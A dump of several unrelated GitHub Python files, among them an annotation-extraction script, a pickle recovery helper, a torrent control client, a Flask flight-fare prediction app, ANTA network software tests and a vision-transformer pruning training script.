quantifier,\n negation,\n quant_var,\n var_count,\n quant_list\n )\n if Type(formula_type) == Type.VARIABLE:\n var_name = json_data['var_name']\n var_count = json_data['var_count']\n quant_list = json_data['quant_list']\n\n return Variable(\n var_name,\n var_count,\n quant_list\n )\n if Type(formula_type) == Type.FUNCTION:\n func_name = json_data['func_name']\n inside = create_formula_from_json(json_data['inside'])\n negation = json_data['negation']\n assigned = json_data['assigned']\n var_count = json_data['var_count']\n quant_list = json_data['quant_list']\n\n return Function(\n func_name,\n inside,\n negation,\n assigned,\n var_count,\n quant_list\n )","repo_name":"KevDev0247/proofster","sub_path":"domain/prenex_normalizer/factory.py","file_name":"factory.py","file_ext":"py","file_size_in_byte":2124,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"41381159599","text":"# -*- coding: utf-8 -*-\nimport ast\n\n\ndef tuplemerge( list1=[], list2=[]): # (B, S)\n list = []\n for item in list2:\n for item2 in list1:\n if item[0] in item2:\n list.append((item[0], item[1] + item2[1]))\n #print(item)\n list2.remove(item)\n list1.remove(item2)\n break\n return list + list2+list1\n\nclass extractHG():\n\n def __init__(self, fileName):\n self.FileName = fileName\n self.modetime = []\n pass\n\n\n\n def timeModify(self, timelist=[], merged_bool=False):\n modetimeList = []\n\n print(self.FileName)\n\n for time in timelist:\n templist = []\n for time2 in time:\n templist.append([int(time2 / 60), int(time2 % 60)])\n modetimeList.append(templist)\n self.modetime = modetimeList\n self.merged = merged_bool\n pass\n\n def extractAnnotaton(self, shift=0, exportfile=''):\n 
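        # Converts each highlight's relative [min, sec] offsets to absolute 'MM:SS' stamps using the start time read from the annotation file's first line, then merges the player/action count tuples for those stamps into one ranked block per highlight ('shift' is currently unused)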
print(exportfile)\n if self.merged:\n merged_directory = 'Merge/'\n else:\n merged_directory = 'Original/'\n\n\n ReadFromAnnotation = open('Annotationlist/Annotationlist_'+self.FileName+'.txt', 'r')\n WriteToTxt = open('Annotationlist/' + merged_directory+exportfile+'/HighlightAnnotation_'+self.FileName+'_'+exportfile+'.txt', 'w')\n starttime = ReadFromAnnotation.readline().rstrip().split(':')\n print(starttime)\n starttime[0] = int(starttime[0])\n starttime[1] = int(starttime[1])\n highlighttimes = []\n for time in self.modetime:\n templist = []\n for time2 in time:\n a = str(int((time2[1]+starttime[1]) / 60+time2[0]+starttime[0]))\n b = str((time2[1]+starttime[1]) % 60)\n templist.append((a if len(a) > 1 else '0'+a)+':'+(b if len(b) > 1 else '0'+b))\n highlighttimes.append(templist)\n if self.merged:\n print(highlighttimes)\n for highlighttime in highlighttimes:\n\n Alluserplayer = []\n Alluseraction = []\n Poweruserplayer = []\n Poweruseraction = []\n Normaluserplayer = []\n Normaluseraction = []\n ReadFromAnnotation.seek(0)\n for line in ReadFromAnnotation:\n # print(line)\n if line.rstrip() in highlighttime:\n # print(line.rstrip())\n ReadFromAnnotation.readline().rstrip()\n Alluserplayer = tuplemerge(Alluserplayer, ast.literal_eval(ReadFromAnnotation.readline().rstrip()))\n # print(Alluserplayer)\n ReadFromAnnotation.readline()\n Alluseraction = tuplemerge(Alluseraction, ast.literal_eval(ReadFromAnnotation.readline().rstrip()))\n ReadFromAnnotation.readline()\n ReadFromAnnotation.readline()\n Poweruserplayer = tuplemerge(Poweruserplayer, ast.literal_eval(ReadFromAnnotation.readline().rstrip()))\n ReadFromAnnotation.readline()\n Poweruseraction = tuplemerge(Poweruseraction, ast.literal_eval(ReadFromAnnotation.readline().rstrip()))\n ReadFromAnnotation.readline()\n ReadFromAnnotation.readline()\n Normaluserplayer = tuplemerge(Normaluserplayer, ast.literal_eval(ReadFromAnnotation.readline().rstrip()))\n ReadFromAnnotation.readline()\n Normaluseraction = tuplemerge(Normaluseraction, ast.literal_eval(ReadFromAnnotation.readline().rstrip()))\n\n WriteToTxt.write(str(highlighttime)+'\\n')\n # print(highlighttime)\n WriteToTxt.write('Alluser\\n')\n WriteToTxt.write(str(sorted(Alluserplayer, key=lambda x: x[1], reverse=True)) + '\\n')\n WriteToTxt.write('\\n')\n WriteToTxt.write(str(sorted(Alluseraction, key=lambda x: x[1], reverse=True)) + '\\n')\n WriteToTxt.write('\\n')\n WriteToTxt.write('PowerUser\\n')\n WriteToTxt.write(str(sorted(Poweruserplayer, key=lambda x: x[1], reverse=True)) + '\\n')\n WriteToTxt.write('\\n')\n WriteToTxt.write(str(sorted(Poweruseraction, key=lambda x: x[1], reverse=True)) + '\\n')\n WriteToTxt.write('\\n')\n WriteToTxt.write('NormalUser\\n')\n WriteToTxt.write(\n str(sorted(Normaluserplayer, key=lambda x: x[1], reverse=True)) + '\\n')\n WriteToTxt.write('\\n')\n WriteToTxt.write(\n str(sorted(Normaluseraction, key=lambda x: x[1], reverse=True)) + '\\n')\n WriteToTxt.write('\\n')\n\n ReadFromAnnotation.close()\n return 0\n\nif __name__ == '__main__':\n\n # 3_05\n ex = extractHG('3_05')\n ex.timeModify([[53], [75], [23], [83], [165], [54]])\n ex.extractAnnotaton(0, 'HITS')\n\n ex.timeModify([[53, 54], [75], [23], [83], [165]], True)\n ex.extractAnnotaton(0, 'HITS')\n\n ex.timeModify([[53], [23], [165], [75], [54], [18], [83], [74], [17], [13], [46], [11], [22], [37], [137]])\n ex.extractAnnotaton(0, 'MT')\n ex.timeModify([[53, 54], [22, 23], [165], [74, 75], [18], [83], [17], [13], [46], [11], [37], [137]], True)\n ex.extractAnnotaton(0, 'MT')\n\n # 3_06\n ex = 
extractHG('3_06')\n ex.timeModify([[58], [62], [59], [126], [184], [135], [54], [125], [55], [49], [63]])\n ex.extractAnnotaton(0, 'HITS')\n #ex.timeModify([[58, 59], [62, 63], [125, 126], [184], [135], [54, 55], [49]], True)\n ex.timeModify([[58, 59], [62, 63], [125, 126], [182], [135], [54, 55], [49]], True)\n ex.extractAnnotaton(0, 'HITS')\n # 58->37:20\n ex.timeModify([[58], [62], [59], [183], [125], [48], [55], [135], [19], [54], [49], [51], [50], [63], [182]])\n ex.extractAnnotaton(0, 'MT')\n ex.timeModify([[58, 59], [62, 63], [182], [125], [48, 49, 50, 51], [54, 55], [135], [19], [182]], True)\n ex.extractAnnotaton(0, 'MT')\n\n # 7_09\n ex = extractHG('7_09')\n ex.timeModify([[71], [75], [70], [72], [69], [141], [76], [131], [68], [152], [57], [132]])\n ex.extractAnnotaton(0, 'HITS')\n ex.timeModify([[68, 69, 70, 71, 72], [75, 76], [141], [131, 132], [152], [57]], True)\n ex.extractAnnotaton(0, 'HITS')\n\n ex.timeModify([[71], [70], [72], [75], [69], [57], [76], [68], [141], [56], [73], [131], [58], [152], [142]])\n ex.extractAnnotaton(0, 'MT')\n ex.timeModify([[68, 69, 70, 71, 72, 73], [75, 76], [56, 57, 58], [141, 142], [131], [152]], True)\n\n ex.extractAnnotaton(0, 'MT')\n\n # 7_10\n ex = extractHG('7_10')\n ex.timeModify([[133], [198], [130], [195], [199], [146], [183], [196], [149], [201], [137], [189]])\n ex.extractAnnotaton(0, 'HITS')\n ex.timeModify([[133], [198, 199], [130], [195, 196], [146], [183], [149], [201], [137], [189]], True)\n\n ex.extractAnnotaton(0, 'HITS')\n\n ex.timeModify([[133], [198], [199], [130], [195], [201], [134], [200], [196], [190], [146], [149], [51], [189], [153]])\n ex.extractAnnotaton(0, 'MT')\n ex.timeModify([[133], [198, 199, 200], [130], [195, 196], [134], [189, 190], [146], [149], [51], [153]], True)\n\n ex.extractAnnotaton(0, 'MT')\n\n # 7_13\n ex = extractHG('7_13')\n ex.timeModify([[157], [64], [50], [65], [85], [86], [51], [161], [89], [158]])\n ex.extractAnnotaton(0, 'HITS')\n ex.timeModify([[157, 158], [64, 65], [50, 51], [85, 86], [161], [89]], True)\n\n ex.extractAnnotaton(0, 'HITS')\n\n ex.timeModify([[64], [65], [50], [157], [51], [86], [85], [135], [158], [89], [161], [136], [52], [66], [162]])\n ex.extractAnnotaton(0, 'MT')\n ex.timeModify([[64, 65, 66], [50, 51, 52], [157, 158], [85, 86], [135, 136], [89], [161, 162]], True)\n\n ex.extractAnnotaton(0, 'MT')\n\n # 7_14\n ex = extractHG('7_14')\n ex.timeModify([[63], [178], [174], [189], [80], [179], [188], [62], [109], [177], [140], [64], [175], [110]])\n ex.extractAnnotaton(0, 'HITS')\n ex.timeModify([[62, 63, 64], [177, 178, 179], [174, 175], [188, 189], [80], [109, 110], [140]], True)\n\n ex.extractAnnotaton(0, 'HITS')\n\n ex.timeModify([[63], [178], [174], [179], [189], [62], [54], [64], [80], [188], [53], [110], [109], [177], [159]])\n ex.extractAnnotaton(0, 'MT')\n ex.timeModify([[62, 63, 64], [177, 178, 179], [174], [188, 189], [53, 54], [80], [109, 110], [159]], True)\n\n ex.extractAnnotaton(0, 'MT')\n","repo_name":"nightheronry/HITS-SHiD","sub_path":"extractHG.py","file_name":"extractHG.py","file_ext":"py","file_size_in_byte":8377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"14462590622","text":"'''\nCreated on Jul 22, 2017\n\n@author: arnon\n'''\nimport os\nimport pickle\n\n\nclass Recovery(object):\n def __init__(self, name, assoc_path, location=None):\n '''\n Args:\n name (str): unique name to id the object\n assoc_path (str) : the associated match file\n location (path): place to store recovery 
objects, use match_file location if None.\n '''\n self.assoc_path = assoc_path\n self.name = name\n self.obj_file = self.get_obj_file(location)\n\n def get_obj_file(self, location=None):\n result = self.assoc_path+'.%s' % self.name\n if location:\n name = os.path.basename(result)\n result = os.path.join(location, name)\n return result\n\n def load(self,):\n obj = None\n if self.obj_file:\n if os.path.isfile(self.obj_file):\n obj_file_m_time = os.path.getmtime(self.obj_file)\n assoc_path_m_time = 0\n if os.path.isfile(self.assoc_path) or os.path.isdir(self.assoc_path):\n assoc_path_m_time = os.path.getmtime(self.assoc_path)\n if assoc_path_m_time > 0 and obj_file_m_time >= assoc_path_m_time:\n # not a new file, read goodobj from file\n print(\"Recovering %s from %s\" % (self.name, self.obj_file))\n with open(self.obj_file, 'rb') as f:\n obj = pickle.load(f)\n return obj\n\n def store(self, obj):\n print(\"Storing %s into %s\" % (self.name, self.obj_file))\n with open(self.obj_file, 'wb') as f:\n pickle.dump(obj, f)\n","repo_name":"rotsehub/rotseana","sub_path":"py/rotseana/findburst/recovery.py","file_name":"recovery.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"} +{"seq_id":"36201970693","text":"import asyncio\nimport logging # for event logging system\nfrom typing import Callable, TypeVar #to simplify complex type signatures (specifies format)\n\nfrom torrent_client.control.manager import ControlManager\nfrom torrent_client.control.server import ControlServer\n\n\n__all__ = ['ControlClient']\n\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\nT = TypeVar('T')\n\n\nclass ControlClient:\n def __init__(self):\n self._reader = None # type: asyncio.StreamReader\n self._writer = None # type: asyncio.StreamWriter\n\n async def connect(self):\n #if port is in range(6995 to 6999)\n for port in ControlServer.PORT_RANGE:\n try:\n self._reader, self._writer = await asyncio.open_connection(host=ControlServer.HOST, port=port)\n\n message = await self._reader.readexactly(len(ControlServer.HANDSHAKE_MESSAGE))\n if message != ControlServer.HANDSHAKE_MESSAGE:\n raise RuntimeError('Unknown control server protocol')\n except Exception as e:\n self.close()\n self._reader = None\n self._writer = None\n logger.debug('failed to connect to port %s: %r', port, e) # else connection fails with given port no\n else:\n break\n else:\n raise RuntimeError('Failed to connect to a control server') \n\n async def execute(self, action: Callable[[ControlManager], T]) -> T:\n ControlServer.send_object(action, self._writer)\n result = await ControlServer.receive_object(self._reader)\n\n if isinstance(result, Exception):\n raise result\n return result\n\n def close(self):\n if self._writer is not None:\n self._writer.close()\n\n async def __aenter__(self) -> 'ControlClient':\n await self.connect()\n return self\n\n async def __aexit__(self, exc_type, exc_val, exc_tb):\n self.close()\n","repo_name":"srilekha30/bit_torrent","sub_path":"bit_torrent/torrent_client/control/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"34019762001","text":"from flask import Flask, request, render_template\r\nimport pickle\r\nfrom flask_cors import cross_origin\r\nimport pandas as pd\r\nimport sklearn\r\n\r\napp = Flask(__name__)\r\nmodel = pickle.load(open('rf_model.pkl', 
'rb'))\r\n\r\n\r\n@app.route('/')\r\n@cross_origin()\r\ndef home_page():\r\n return render_template('index.html')\r\n\r\n\r\n@app.route('/Prediction', methods=[\"GET\", \"POST\"])\r\n@cross_origin()\r\ndef predict_page():\r\n if request.method == \"POST\":\r\n\r\n # extract features from Date of journey\r\n dep_date = request.form['Dep_Time']\r\n\r\n Journey_Day = int(pd.to_datetime(dep_date, format=\"%Y-%m-%dT%H:%M\").day)\r\n Journey_Month = int(pd.to_datetime(dep_date, format=\"%Y-%m-%dT%H:%M\").month)\r\n\r\n # Departure time\r\n Dep_Hour = int(pd.to_datetime(dep_date, format=\"%Y-%m-%dT%H:%M\").hour)\r\n Dep_Min = int(pd.to_datetime(dep_date, format=\"%Y-%m-%dT%H:%M\").minute)\r\n\r\n # Arrival time\r\n arrival_date = request.form[\"Arrival_Time\"]\r\n Arrival_Hour = int(pd.to_datetime(arrival_date, format=\"%Y-%m-%dT%H:%M\").hour)\r\n Arrival_Min = int(pd.to_datetime(arrival_date, format=\"%Y-%m-%dT%H:%M\").minute)\r\n\r\n # Duration\r\n Duration_Hours = abs(Arrival_Hour - Dep_Hour)\r\n Duration_Min = abs(Arrival_Min - Dep_Min)\r\n\r\n # Get stops\r\n Total_Stops = int(request.form[\"stops\"])\r\n\r\n # ----------------------\r\n # getting source info\r\n Source = request.form[\"Destination\"]\r\n if Source == 'Delhi':\r\n sc_Delhi = 1\r\n sc_Kolkata = 0\r\n sc_Mumbai = 0\r\n sc_Chennai = 0\r\n\r\n elif (Source == 'Kolkata'):\r\n sc_Delhi = 0\r\n sc_Kolkata = 1\r\n sc_Mumbai = 0\r\n sc_Chennai = 0\r\n\r\n elif (Source == 'Mumbai'):\r\n sc_Delhi = 0\r\n sc_Kolkata = 0\r\n sc_Mumbai = 1\r\n sc_Chennai = 0\r\n\r\n elif (Source == 'Chennai'):\r\n sc_Delhi = 0\r\n sc_Kolkata = 0\r\n sc_Mumbai = 0\r\n sc_Chennai = 1\r\n\r\n else:\r\n sc_Delhi = 0\r\n sc_Kolkata = 0\r\n sc_Mumbai = 0\r\n sc_Chennai = 0\r\n\r\n # -------------------------------------------\r\n # Getting Destination\r\n\r\n Destination = request.form[\"Destination\"]\r\n if Destination == 'Cochin':\r\n d_Cochin = 1\r\n d_Delhi = 0\r\n d_New_Delhi = 0\r\n d_Hyderabad = 0\r\n d_Kolkata = 0\r\n\r\n elif Destination == 'Delhi':\r\n d_Cochin = 0\r\n d_Delhi = 1\r\n d_New_Delhi = 0\r\n d_Hyderabad = 0\r\n d_Kolkata = 0\r\n\r\n elif Destination == 'New_Delhi':\r\n d_Cochin = 0\r\n d_Delhi = 0\r\n d_New_Delhi = 1\r\n d_Hyderabad = 0\r\n d_Kolkata = 0\r\n\r\n elif Destination == 'Hyderabad':\r\n d_Cochin = 0\r\n d_Delhi = 0\r\n d_New_Delhi = 0\r\n d_Hyderabad = 1\r\n d_Kolkata = 0\r\n\r\n elif Destination == 'Kolkata':\r\n d_Cochin = 0\r\n d_Delhi = 0\r\n d_New_Delhi = 0\r\n d_Hyderabad = 0\r\n d_Kolkata = 1\r\n\r\n else:\r\n d_Cochin = 0\r\n d_Delhi = 0\r\n d_New_Delhi = 0\r\n d_Hyderabad = 0\r\n d_Kolkata = 0\r\n\r\n # ---------------------------------------------\r\n # Get Airline\r\n airline = request.form['airline']\r\n if airline == 'Jet Airways':\r\n Jet_Airways = 1\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n Trujet = 0\r\n elif (airline == 'IndiGo'):\r\n Jet_Airways = 0\r\n IndiGo = 1\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n Trujet = 0\r\n\r\n elif (airline == 'Air India'):\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 1\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n 
Trujet = 0\r\n\r\n elif (airline == 'Multiple carriers'):\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 1\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n Trujet = 0\r\n\r\n elif (airline == 'SpiceJet'):\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 1\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n Trujet = 0\r\n\r\n elif (airline == 'Vistara'):\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 1\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n Trujet = 0\r\n\r\n elif (airline == 'GoAir'):\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 1\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n Trujet = 0\r\n\r\n elif (airline == 'Multiple carriers Premium economy'):\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 1\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n Trujet = 0\r\n\r\n elif (airline == 'Jet Airways Business'):\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 1\r\n Vistara_Premium_economy = 0\r\n Trujet = 0\r\n\r\n elif (airline == 'Vistara Premium economy'):\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 1\r\n Trujet = 0\r\n\r\n elif (airline == 'Trujet'):\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n Trujet = 1\r\n\r\n else:\r\n Jet_Airways = 0\r\n IndiGo = 0\r\n Air_India = 0\r\n Multiple_carriers = 0\r\n SpiceJet = 0\r\n Vistara = 0\r\n GoAir = 0\r\n Multiple_carriers_Premium_economy = 0\r\n Jet_Airways_Business = 0\r\n Vistara_Premium_economy = 0\r\n Trujet = 0\r\n\r\n # make prediction\r\n prediction = model.predict([[\r\n Total_Stops,\r\n Journey_Day,\r\n Journey_Month,\r\n Dep_Hour,\r\n Dep_Min,\r\n Arrival_Hour,\r\n Arrival_Min,\r\n Duration_Hours,\r\n Duration_Min,\r\n Air_India,\r\n GoAir,\r\n IndiGo,\r\n Jet_Airways,\r\n Jet_Airways_Business,\r\n Multiple_carriers,\r\n Multiple_carriers_Premium_economy,\r\n SpiceJet,\r\n Trujet,\r\n Vistara,\r\n Vistara_Premium_economy,\r\n sc_Chennai,\r\n sc_Delhi,\r\n sc_Kolkata,\r\n sc_Mumbai,\r\n d_Cochin,\r\n d_Delhi,\r\n d_Hyderabad,\r\n d_Kolkata,\r\n d_New_Delhi]])\r\n\r\n # round it to 2 decimals only\r\n price = round(prediction[0], 2)\r\n return render_template('prediction.html', prediction=price)\r\n else:\r\n return render_template('index.html')\r\n\r\n\r\nif __name__ == '__main__':\r\n 
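    # Flask's built-in development server; debug=True enables the interactive debugger and auto-reload, so disable it (or serve via a WSGI server such as gunicorn) in production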
app.run(debug=True)\r\n","repo_name":"AdiShirsath/Machine_learning_projects","sub_path":"Regression_Problems/Flight_Fare_Prediction/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9210,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"71"} +{"seq_id":"3812616996","text":"#!/usr/bin/env python\nimport roslibpy\nimport time\n\nfrom common.shared import to_epoch, init_logging\nfrom twisted.internet import reactor\n\nreactor.timeout = lambda: 0.0001\n\ninit_logging()\n\nros = roslibpy.Ros(\"ws://localhost:9090\")\n\n\ndef sub(msg):\n # The `age` of the message should remain constant, but it increases seemingly indefinetly\n age = time.time() - to_epoch(msg[\"stamp\"])\n print(\"Age of message: %6.3f seconds\" % age)\n time.sleep(0.5) # increase if necessary; above a certain loop time the described behavior occurs\n\n\nts = roslibpy.Topic(ros, \"/test\", \"std_msgs/Header\", queue_length=1)\nts.subscribe(sub)\n\nros.run_forever()\n","repo_name":"HWiese1980/roslibpytest","sub_path":"scripts/test_sub.py","file_name":"test_sub.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"41205852300","text":"from __future__ import annotations\n\n# Need to keep List for pydantic in python 3.8\nfrom typing import List\n\nfrom anta.models import AntaCommand, AntaTest\n\n\nclass VerifyEOSVersion(AntaTest):\n \"\"\"\n Verifies the device is running one of the allowed EOS version.\n \"\"\"\n\n name = \"VerifyEOSVersion\"\n description = \"Verifies the device is running one of the allowed EOS version.\"\n categories = [\"software\"]\n commands = [AntaCommand(command=\"show version\")]\n\n class Input(AntaTest.Input): # pylint: disable=missing-class-docstring\n versions: List[str]\n \"\"\"List of allowed EOS versions\"\"\"\n\n @AntaTest.anta_test\n def test(self) -> None:\n command_output = self.instance_commands[0].json_output\n if command_output[\"version\"] in self.inputs.versions:\n self.result.is_success()\n else:\n self.result.is_failure(f'device is running version {command_output[\"version\"]} not in expected versions: {self.inputs.versions}')\n\n\nclass VerifyTerminAttrVersion(AntaTest):\n \"\"\"\n Verifies the device is running one of the allowed TerminAttr version.\n \"\"\"\n\n name = \"VerifyTerminAttrVersion\"\n description = \"Verifies the device is running one of the allowed TerminAttr version.\"\n categories = [\"software\"]\n commands = [AntaCommand(command=\"show version detail\")]\n\n class Input(AntaTest.Input): # pylint: disable=missing-class-docstring\n versions: List[str]\n \"\"\"List of allowed TerminAttr versions\"\"\"\n\n @AntaTest.anta_test\n def test(self) -> None:\n command_output = self.instance_commands[0].json_output\n command_output_data = command_output[\"details\"][\"packages\"][\"TerminAttr-core\"][\"version\"]\n if command_output_data in self.inputs.versions:\n self.result.is_success()\n else:\n self.result.is_failure(f\"device is running TerminAttr version {command_output_data} and is not in the allowed list: {self.inputs.versions}\")\n\n\nclass VerifyEOSExtensions(AntaTest):\n \"\"\"\n Verifies all EOS extensions installed on the device are enabled for boot persistence.\n \"\"\"\n\n name = \"VerifyEOSExtensions\"\n description = \"Verifies all EOS extensions installed on the device are enabled for boot persistence.\"\n categories = [\"software\"]\n commands = [AntaCommand(command=\"show extensions\"), 
AntaCommand(command=\"show boot-extensions\")]\n\n @AntaTest.anta_test\n def test(self) -> None:\n boot_extensions = []\n show_extensions_command_output = self.instance_commands[0].json_output\n show_boot_extensions_command_output = self.instance_commands[1].json_output\n installed_extensions = [\n extension for extension, extension_data in show_extensions_command_output[\"extensions\"].items() if extension_data[\"status\"] == \"installed\"\n ]\n for extension in show_boot_extensions_command_output[\"extensions\"]:\n extension = extension.strip(\"\\n\")\n if extension != \"\":\n boot_extensions.append(extension)\n installed_extensions.sort()\n boot_extensions.sort()\n if installed_extensions == boot_extensions:\n self.result.is_success()\n else:\n self.result.is_failure(f\"Missing EOS extensions: installed {installed_extensions} / configured: {boot_extensions}\")\n","repo_name":"arista-netdevops-community/anta","sub_path":"anta/tests/software.py","file_name":"software.py","file_ext":"py","file_size_in_byte":3326,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"71"} +{"seq_id":"2744864539","text":"import torch\nimport torch.optim as optim\nimport torch.nn as nn\nfrom timm.scheduler import CosineLRScheduler\nfrom timm.models import create_model\n\nimport numpy as np\nimport os\nimport argparse\n\nimport utils\nimport pruner\nimport models\n\nparser = argparse.ArgumentParser()\n\n# model config\nparser.add_argument('--model')\nparser.add_argument('--pretrain', action='store_true')\n\n# training config\nparser.add_argument('--dataset', choices=['cifar10', 'cifar100'])\nparser.add_argument('--batch_size', type=int, default=128)\nparser.add_argument('--epochs', type=int, default=150)\n\n# pruning config\nparser.add_argument('--pruning', action='store_true')\nparser.add_argument('--sparsity', type=float)\nparser.add_argument('--method', choices=['random', 'magnitude', 'snip', 'grasp', 'snip_magnitude'])\nparser.add_argument('--alpha', type=float)\n\n# else\nparser.add_argument('--save_dir', default='./outputs')\nparser.add_argument('--seed', type=int, default=428)\n\nargs = parser.parse_args()\n\ndef main():\n device = torch.cuda.device_count()\n print('num gpus:', device)\n torch.manual_seed(args.seed)\n np.random.seed(args.seed)\n\n if args.dataset == 'cifar10':\n num_classes = 10\n elif args.dataset == 'cifar100':\n num_classes = 100\n utils.mixup_args['num_classes'] = num_classes\n train_loader, valid_loader = utils.get_dataloader(args.dataset, args.batch_size, data_download=True)\n\n model = create_model(args.model, pretrained=args.pretrain)\n model.head = nn.Linear(model.head.in_features, num_classes)\n if args.pretrain:\n init_data = model.state_dict()\n \n # pruning\n if args.pruning:\n print('pruning method:', args.method)\n print('sparsity:', args.sparsity)\n\n if 'mixer' in args.model:\n rm_modules = models.mixer_rm_modules(model)\n elif 'vit' in args.model:\n rm_modules = models.vit_rm_modules(model)\n elif 'pool' in args.model:\n rm_modules = models.pool_rm_modules(model)\n\n if args.method == 'random':\n pruner.SCORE = pruner.random(rm_modules)\n elif args.method == 'magnitude':\n pruner.SCORE = pruner.magnitude(rm_modules)\n elif args.method == 'snip':\n pruner.SCORE = pruner.snip(model, rm_modules, train_loader, device)\n elif args.method == 'grasp':\n pruner.SCORE = pruner.grasp(model, rm_modules, train_loader, device)\n elif args.method == 'snip_magnitude':\n pruner.SCORE = pruner.snip_magnitude(model, rm_modules, train_loader, 
device, args.alpha)\n \n model = create_model(args.model, pretrained=args.pretrain)\n model.head = nn.Linear(model.head.in_features, num_classes)\n if args.pretrain:\n model.load_state_dict(init_data)\n\n if 'mixer' in args.model:\n rm_modules = models.mixer_rm_modules(model)\n elif 'vit' in args.model:\n rm_modules = models.vit_rm_modules(model)\n elif 'pool' in args.model:\n rm_modules = models.pool_rm_modules(model)\n\n pruner.prune.global_unstructured(\n rm_modules,\n pruning_method=pruner.Pruner,\n amount = args.sparsity\n )\n\n # saving config\n if not os.path.exists(args.save_dir):\n os.mkdir(args.save_dir)\n\n save_path = args.save_dir + r'/' + args.model\n if not os.path.exists(save_path):\n os.mkdir(save_path)\n \n if args.pruning:\n save_path = save_path + r'/' + args.method\n if not os.path.exists(save_path):\n os.mkdir(save_path)\n\n if args.method == 'snip_magnitude':\n file_name = 'alpha{}_sparsity{}.chkpt'.format(args.alpha, int(args.sparsity * 100))\n else:\n if not args.pruning:\n file_name = 'non_pruning.chkpt'\n else:\n file_name = 'sparsity{}.chkpt'.format(int(args.sparsity * 100))\n if not args.pretrain:\n file_name = 'fs' + file_name\n \n\n\n history = {\n 'train_loss': [],\n 'valid_top1_acc': [],\n 'valid_top5_acc': [],\n 'valid_loss': [],\n 'best_epoch': 0,\n 'best_model': None\n }\n\n optimizer = optim.Adam\n loss_func = nn.CrossEntropyLoss()\n scheduler = CosineLRScheduler(\n optim.Adam(nn.Linear(1, 1).parameters()), t_initial=args.epochs, \n lr_min=1e-4, \n warmup_t=10, \n warmup_lr_init=5e-5, \n warmup_prefix=True\n )\n\n # training\n best_loss = float('inf')\n\n\n for epoch in range(args.epochs):\n lr = scheduler.get_epoch_values(epoch)[0]\n \n train_loss = utils.train_multi_gpu(\n model, train_loader, loss_func, optimizer, device, epoch+1, lr=lr, mixup=True\n )\n valid_loss, valid_top1_acc, valid_top5_acc = utils.validation_multi_gpu(\n model, valid_loader, loss_func, device, epoch+1\n )\n model.zero_grad()\n \n history['train_loss'].append(train_loss) \n history['valid_top1_acc'].append(valid_top1_acc)\n history['valid_top5_acc'].append(valid_top5_acc)\n history['valid_loss'].append(valid_loss)\n \n print('top1-acc:', valid_top1_acc)\n if best_loss > valid_loss:\n best_loss = valid_loss\n history['best_epoch'] = epoch\n history['best_model'] = model.state_dict()\n print('updated best loss!')\n \n print('best acc:', max(history['valid_top1_acc']))\n \n torch.save(history, os.path.join(save_path, file_name))\n\nif __name__ == '__main__':\n 